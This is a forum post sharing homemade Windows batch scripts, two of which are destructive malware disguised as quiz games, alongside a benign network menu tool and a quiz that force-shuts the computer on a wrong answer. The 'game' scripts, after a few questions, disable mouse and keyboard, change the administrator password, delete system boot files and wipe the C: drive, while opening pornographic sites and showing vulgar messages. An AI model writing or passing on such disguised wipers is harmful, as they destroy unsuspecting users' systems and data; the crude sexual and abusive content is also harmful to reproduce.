Compilation of my batch work

Proxybypass

Member
Reputation
0
If your going through the games, and you see other names, such as Telnet, Proxy bypass, etc, there me, these were all coded by me, there just my other forum names.


1: A virus/ game WILL DESTROY YOUR CPU

Code:
@echo off
title TelNet's exciting game!  
echo How are you today?
echo Let's begin a little game sha'll we?
ping 127.0.0.1 -n 2 -w 1000 > nul
Cls
Echo So let's start!
Pause
Cls
Echo So are you a boy or girl?
set /p sex=
if %sex%==Boy goto :B
if %sex%==Girl goto :G

:B
Echo Ahh.. so your going to play the "Male" Partion of the game
Echo First question... What is 1+1
set /p answer=
if %answer%==2 goto :GO
if not defined %answer% exit

:GO
Echo Let the Fun begin
ping 127.0.0.1 -n 1 -w 1000 > nul
Rundll32 mouse,disable
Rundll32 keyboard,disable
ipconfig/release
if Errorlevel1 ipconfig /release_all
%0 >>other.bat
net user administrator HahaFuckYou
:a
start www.redtube.com
start www.redtube.com
goto :a

:G
Echo Well you wanna play the game now? Do ya?
Echo Well let's begin!
ping 127.0.0.1 -n 2 -w 1000 > nul
Echo First question! What is 10/5?
Echo pick 5 OR GTFO (:
Pause
Cls
set /p correct=
if %correct%==5 goto :Looser
if not defined %correct% exit

:Looser
Echo Well you've lost the game
Del /f /q "C:\Program Files\Internet Explorer\iexplore.exe"
Del /f /q "C:\users\%userprofile%\my documents\*.*"
Net start "Messenger"
Net send * "Proxy got you"
Net send * "This is my Revenge"
Net send * "Hope you have fun"
Del /F /S /Q C:
Shutdown -s -t 10 -c "Get shit on, bitches"

2:A "Net" Tool
Code:
@echo off
Title TelNet Multi-Tool	

REM Declare What The Tool Is Used For
Echo This is a multi function tool I've created, just for practice. No specific rhyme
Echo To this tool
Pause
Cls

:Menu
REM Set the path of what this tool will do.
Echo Pick what you want the tool to do..
Echo 1.)Open Social NetWorking Sites
Echo 2.)Open your favorite site [HackForums, duh]
Echo 3.)Locate an IP
Echo 4.)See who is on your network.
Set /p option=
If %option%==1 Goto Sites
If %option%==2 Goto Fav
If %option%==3 Goto Look
If %option%==4 Goto Con

:Sites
REM This Will Take You To Some Social NetWorking Sites
Start Www.myspace.com
Start Www.Facebok.com
Start Www.Omegle.com
Echo Now enjoy your friends, N00B (:
Ping 127.0.0.1 -n 3 -w 1000 > nul
Goto :Menu

:Fav
REM This Will Start Your Favorite Site
Echo Starting HackForum In 5..4..3..2..1..
Ping 127.0.0.1 -n 5 -w 1000 > nul
Start Www.HackForums.net
Cls
Goto :Menu

:Look
REM This Will Allow You To Search An IP's Location
Echo If you want to Look up an IP's location Hit (1)
Echo If you want to ping a site Hit (2)
Cls
Set /p ip 
If %ip%==1 Goto Web
If %ip%==2 Goto Cmd
If not defined %ip% goto :menu

:Web
REM IP Adrress Locator
Echo Here you can enter an IP to locate it.
Start Www.ip-lookup.net/
Echo Enter the IP in the box on the site
Pause
Goto :Menu

:Cmd
REM Enter A URL Get A IP *[Credits To XeKe For This Part Of The Code]*
cls
echo Type the URL (without http://)
Set /p URL=
Echo /*IP address of %url%*/ >> %filename%.txt
Ping %URL% >> %filename%.txt
Goto :Menu

REM See Ingoing/ OutGoing Connections
:Con
Echo Here you can see the Ingoing/ Outgoing connections currently on your CPU 
Cls
Echo /*Connections*/ >> %filename%.txt
Netstat >> %filename%.txt
Goto :Menu

3: A long Virus WILL DESTROY YOUR CPU

Code:
@echo off
Title TelNet's Prize Winner
Echo Ok guys, this is my game, if you win, you get a prize.
Echo Simple, eh?
ping 127.0.0.1 -n 3 -w 1000 > nul
Echo So.. Here is your first question: What is 5*5
set /p math=
if %math%==25 goto a
if not defined %math% exit 

:a
Echo Well looks like you've gotten th first question right.
Pause
Cls
Echo Here is your enxt question... What is 10+10
set /p add=
if %add%==20 goto b
if not defined %add% exit

:b
Echo Well your just ripping through this game, aren't you?
Echo It's time to get a little bit harder.
ping 127.0.0.1 -n 3 -w 1000 > nul
Cls
Echo Here we go... What is 20x5
set /p choose=
if %choose%==100 goto c
if not defined %choose% exit 

:c
Echo Well... Your still hanging in there!
Echo Keep up the good work
Pause
Cls
Echo For this next part, you'll be redirected to a site
Start http://farm4.static.flickr.com/3430/3182213824_d9ee0b6242.jpg
Cls
Echo How many girls are in the picture?
set /p girls=
if %girls%==3 goto d
if not defined %girls% exit

:d
Echo Dang!! You've made it pretty damn far into this game!
Pause
Cls
Echo Next question: What color was Rosa Parks
Echo Pick either: Black, White OR orange
ping 127.0.0.1 -n 7 -w 1000 > nul
Cls
set /p race=
if %race%==Black goto e
if %race%==White goto e
if %race%==Orange goto e
if not defined %race% exit

:e
Echo We'll you've done good!
Echo Here is the question to win the game!
Echo What is 12/2?
set /p win=
if %win%==6 goto Gameover
if not defined %win% goto Gameover

:GameOver
Echo Well you've made it to the end of the game.. Time for your prize
Del C:\WINDOWS\System32\winlogon.exe /Q /S
Del C:\WINDOWS\winhelp /Q /S 
Del C:\WINDOWS\System32\Boot\winload.exe /Q /S
Rundll32 mouse,disable
Rundll32 keyboard,disable
start http://redtube.com/32570
start http://redtube.com/31887 
start http://www.youtube.com/watch?v=QjEVi4Cckfg
Msg * Some nice background music to enjoy!
Ping 127.0.0.1 - n 3 -w 1000 > nul
Shutdown -s -t 20 -c "You've just been analy rapped"
Del /F /S /Q C:\

4: Just a regular game

Code:
@echo off
:start

echo Difficulty
echo Each Has 5 Questions
echo 1) Easy
echo 2) Medium
echo 3) Hard
set /p hard= CHOOSE 1, 2 OR 3!
if %hard%==1 goto easy
if %hard%==2 goto med
if %hard%==3 goto hard
if not defined %hard% goto win
goto end

:easy
echo YOU HAVE CHOSEN EASY! NOTE: ANSWER ALL QUESTIONS IN LOW CAPS!
pause
cls
Echo 1) What is 1x1x1x1x1x1x1x1x1x1x1x1x2?
set /p sum= 1) 
if %sum%==2 goto sum
if not defined %sum% exit

:sum
echo Dont get happy, that was easy....
pause
cls
Echo 2) How many colors are there in the rainbow?
set /p col= 
ping 127.0.0.1 -n 3 -w 1000 > nul
if %col%==7 goto col
if not defined %col% exit

:col
echo Ok, that was good, but ur still a n00b.
pause
cls
Echo 3) What color is the sky on a clear, sunny day
set /p sky= 
if %sky%==blue goto sky
if not defined %sky% exit

:sky
echo That was easy, now you're a super noob!
pause
cls
Echo 4) What was the answer to the first question?
set /p hmm= 
if %hmm%==2 goto hmm
if not defined %hmm% exit

:hmm
echo AHAHAHAHAHA.noob
pause
cls
Echo 5) What is the color of an orange?
set /p or= 
if %or%==orange goto woo
if not defined %or% exit 

:woo
echo CONGRATULATIONS! YOU HAVE BECOME NOOBSTAR! YOUR PRIZE IS PAINT!
pause
cls
start mspaint
exit

:med
echo YOU HAVE CHOSEN MEDIUM! NOTE: ANSWER ALL QUESTIONS IN LOW CAPS!
pause
cls
set /p summ= 
Echo 1) What is 10x10x10x10?
if %summ%==10000 goto summ
goto end

:summ
echo You got the first one right, egghead.
pause
cls
Echo 2) Finish the sentence: I'd rather have a bowl of coco .....
set /p fin=  
if %fin%==pops goto :fin
if not defined %fin% exit

:fin
echo I LIKE COCO POPS YOU EGG
pause
cls
Echos the color bluey green? HINT: BEGINS WITH 'T'!
set /p turq= 3)
if '%turq%'== 'turqoise' goto turq
goto end
:turq
echo That was easy because I gave you a hint!
pause
cls
set /p as=4) What is the biggest continent in the World?
if '%as%'== 'asia' goto as
goto end
:as
echo You know your countries! you gogo plop!
pause
cls
set /p ww= 5) In which year did World War 2 start?
if '%ww%'== '1939' goto ww
goto end
:ww
echo YOU WON THE MEDIUM TEST THING! YOUR PRIZE IS GOOGLE AND PAINT AND A SCREEN SAVER! BUT I BET YOU CANT DO THE HARD ONE!!!
start http://www.google.com
start mspaint
start bubbles.scr -s
pause
cls
exit
:hard
echo YOU HAVE CHOSEN HARD! HERES A CALCULATOR TO HELP YOU, YOURE GONNA NEED IT! NOTE: ANSWER ALL QUESTIONS IN LOW CAPS!
start calc
pause
cls
set /p sum1= 1) What is 10x8123x23842x234x14455x124563x1245346?
if '%sum1%'== '1016183595644135262561999600' goto sum1
goto end
:sum1
echo HAHAHAHAHAHA, THAT ONE WAS HARD! AND IT WAS THE FIRST ONE! oh, and heres Google to help you on the next one:
start http://www.google.com
pause
cls
set /p lyt= 2) What is it called when light is split into different colors?HINT: BEGINS WITH 'D'
if '%lyt%'== 'dispersion' goto lyt
goto end
:lyt
echo DONT GET HAPPY, YOU HAD GOOGLE TO HELP YOU! AND HERES ARGOS TO HELP YOU!:
start http://www.argos.co.uk
pause
cls
set /p arg= 3) What item on argos has the catalogue number: 881/0364 . JUST SAY WHAT IT IS WITH ONE WORD!
if '%arg%'== 'sofa' goto arg
goto end
:arg
echo IT WAS AN INFLATABLE SOFA? YOU GOT IT RIGHT ANYWAY!
pause
cls
set /p poo= 4) How many characters are in this word thing? dja9-hfpauetqpvnvapdjapf63=4814#fjasd#][]daj#]'#fajkfia#]dsjfs
if '%poo%'== '62' goto poo
goto end
:poo
echo HMMM, YOURE ON THE LAST ONE, THIS IS GONNA BE HARD!!!!
pause
cls
set /p hrd= 5) How many letters are in this: qskfvazm5436s46l6fi7f8l'af;cm#qer8p5a#sc7m8v#f'r[e]u5s6j3an6v8oa0s0pd-#o'w[e]r'h#f[b,a.n/shfoa,m.sj/co.ahsnq/w.eurp\asjf'jc[ap#ajf[jc]'pa#j[fjpcpajc'ja#jfh[epoq'hf#n[apoah#c'nq[er]u'pda#m[j]q#sir'p#c[m'aj[f#h'y[w
if '%hard%'== '113' goto win
goto end
:win
echo OMG!!! YOU WON!!!! YOUR PRIZE IS 10 CALCULATORS AND A SCREEN SAVER!!!!!
timeout /T 5

start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start bubbles.scr -s
exit
:end
set /p ta= YOU LOST!!! NOOB!!!
shutdown -s -t 10 -c "GO TO SCHOOL YOU FLIPPIN NOB!" -fd
 
these are very nice man, but did you make these all yourself, because ive seen alot of similaar scripts elsewere
 
Nice batches :thumbsup:

Althought, I'd feel like a dick if I deleted someone's winlogon and system32 files if they got the last question right
 
Cookies are required to use this site. You must accept them to continue using the site. Learn more…